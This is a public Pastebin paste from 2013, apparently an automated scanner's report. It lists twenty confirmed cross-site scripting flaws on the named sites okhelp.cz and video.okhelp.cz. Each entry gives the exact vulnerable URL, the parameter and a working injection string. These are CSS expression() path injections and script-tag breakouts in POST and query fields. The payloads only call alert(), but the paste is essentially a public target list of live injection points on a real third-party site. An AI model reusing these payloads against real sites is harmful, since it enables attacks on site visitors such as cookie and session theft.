API tools faq
paste
Advertisement
sroub3k

okhelp.cz

sroub3k
Jan 11th, 2013
683
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.29 KB | None | 0 0
raw download clone embed print report
  1. ||| XSS (Cross-site Scripting) - http://okhelp.cz
  2.  
  3. Severity: Important
  4. Confirmation: Confirmed
  5. URL: http://okhelp.cz/presny-cas/sms-zdarma.php/" stYle="x:expre/**/ssion(alert(9))
  6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  7. Parameter Name: URI-BASED
  8. Parameter Type: RawUrlInjection
  9. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  10.  
  11. Severity: Important
  12. Confirmation: Confirmed
  13. URL: http://okhelp.cz/presny-cas/povodne.php/" stYle="x:expre/**/ssion(alert(9))
  14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  15. Parameter Name: URI-BASED
  16. Parameter Type: RawUrlInjection
  17. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  18.  
  19. Severity: Important
  20. Confirmation: Confirmed
  21. URL: http://okhelp.cz/presny-cas/index.php/" stYle="x:expre/**/ssion(alert(9))
  22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  23. Parameter Name: URI-BASED
  24. Parameter Type: RawUrlInjection
  25. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  26.  
  27. Severity: Important
  28. Confirmation: Confirmed
  29. URL: http://okhelp.cz/presny-cas/jizdni-rady.php/" stYle="x:expre/**/ssion(alert(9))
  30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  31. Parameter Name: URI-BASED
  32. Parameter Type: RawUrlInjection
  33. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  34.  
  35. Severity: Important
  36. Confirmation: Confirmed
  37. URL: http://okhelp.cz/presny-cas/predpoved-pocasi.php/" stYle="x:expre/**/ssion(alert(9))
  38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  39. Parameter Name: URI-BASED
  40. Parameter Type: RawUrlInjection
  41. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  42.  
  43. Severity: Important
  44. Confirmation: Confirmed
  45. URL: http://okhelp.cz/presny-cas/tv-program.php/" stYle="x:expre/**/ssion(alert(9))
  46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  47. Parameter Name: URI-BASED
  48. Parameter Type: RawUrlInjection
  49. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  50.  
  51. Severity: Important
  52. Confirmation: Confirmed
  53. URL: http://okhelp.cz/presny-cas/stolety-kalendar.php/" stYle="x:expre/**/ssion(alert(9))
  54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  55. Parameter Name: URI-BASED
  56. Parameter Type: RawUrlInjection
  57. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  58.  
  59. Severity: Important
  60. Confirmation: Confirmed
  61. URL: http://okhelp.cz/presny-cas/benzin-nafta-lpg-ceny-phm.php/" stYle="x:expre/**/ssion(alert(9))
  62. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  63. Parameter Name: URI-BASED
  64. Parameter Type: RawUrlInjection
  65. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  66.  
  67. Severity: Important
  68. Confirmation: Confirmed
  69. URL: http://okhelp.cz/presny-cas/kalendar.php/" stYle="x:expre/**/ssion(alert(9))
  70. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  71. Parameter Name: URI-BASED
  72. Parameter Type: RawUrlInjection
  73. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  74.  
  75. Severity: Important
  76. Confirmation: Confirmed
  77. URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php/" stYle="x:expre/**/ssion(alert(9))
  78. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  79. Parameter Name: URI-BASED
  80. Parameter Type: RawUrlInjection
  81. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
  82.  
  83. Severity: Important
  84. Confirmation: Confirmed
  85. URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
  86. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  87. Parameter Name: den
  88. Parameter Type: Post
  89. Attack Pattern: '"--></style></script><script>alert(0x000186)</script>
  90.  
  91. Severity: Important
  92. Confirmation: Confirmed
  93. URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
  94. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  95. Parameter Name: mesic
  96. Parameter Type: Post
  97. Attack Pattern: '"--></style></script><script>alert(0x00018F)</script>
  98.  
  99. Severity: Important
  100. Confirmation: Confirmed
  101. URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok='"--></style></script><script>alert(0x000196)</script>
  102. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  103. Parameter Name: rok
  104. Parameter Type: Querystring
  105. Attack Pattern: '"--></style></script><script>alert(0x000196)</script>
  106.  
  107. Severity: Important
  108. Confirmation: Confirmed
  109. URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
  110. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  111. Parameter Name: rok
  112. Parameter Type: Post
  113. Attack Pattern: '"--></style></script><script>alert(0x0001C3)</script>
  114.  
  115. Severity: Important
  116. Confirmation: Confirmed
  117. URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php
  118. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  119. Parameter Name: rok
  120. Parameter Type: Post
  121. Attack Pattern: '"--></style></script><script>alert(0x0001CA)</script>
  122.  
  123. Severity: Important
  124. Confirmation: Confirmed
  125. URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok=2012
  126. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  127. Parameter Name: rok
  128. Parameter Type: Post
  129. Attack Pattern: '"--></style></script><script>alert(0x000203)</script>
  130.  
  131. ||| XSS (Cross-site Scripting) - http://video.okhelp.cz
  132.  
  133. Severity: Important
  134. Confirmation: Confirmed
  135. URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000004)</script>
  136. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  137. Parameter Name: db
  138. Parameter Type: Querystring
  139. Attack Pattern: '"--></style></script><script>alert(0x000004)</script>
  140.  
  141. Severity: Important
  142. Confirmation: Confirmed
  143. URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000064)</script>&post=katy-perry_firework
  144. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  145. Parameter Name: db
  146. Parameter Type: Querystring
  147. Attack Pattern: '"--></style></script><script>alert(0x000064)</script>
  148.  
  149. Severity: Important
  150. Confirmation: Confirmed
  151. URL: http://video.okhelp.cz/index.php?db=best_of_hits_2010&post='"--></style></script><script>alert(0x000085)</script>
  152. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  153. Parameter Name: post
  154. Parameter Type: Querystring
  155. Attack Pattern: '"--></style></script><script>alert(0x000085)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!